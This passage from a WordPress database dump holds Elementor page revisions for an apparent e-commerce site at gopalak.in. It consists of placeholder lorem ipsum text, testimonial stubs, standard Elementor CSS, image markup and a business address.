pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 10:16:01','2022-10-03 04:46:01','',1373,'https://gopalak.in/?p=1514',0,'revision','',0),(1516,1,'2022-10-03 10:57:57','2022-10-03 05:27:57','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 10:57:57','2022-10-03 05:27:57','',1373,'https://gopalak.in/?p=1516',0,'revision','',0),(1517,1,'2022-10-03 10:57:57','2022-10-03 05:27:57','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"1920\" height=\"1200\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 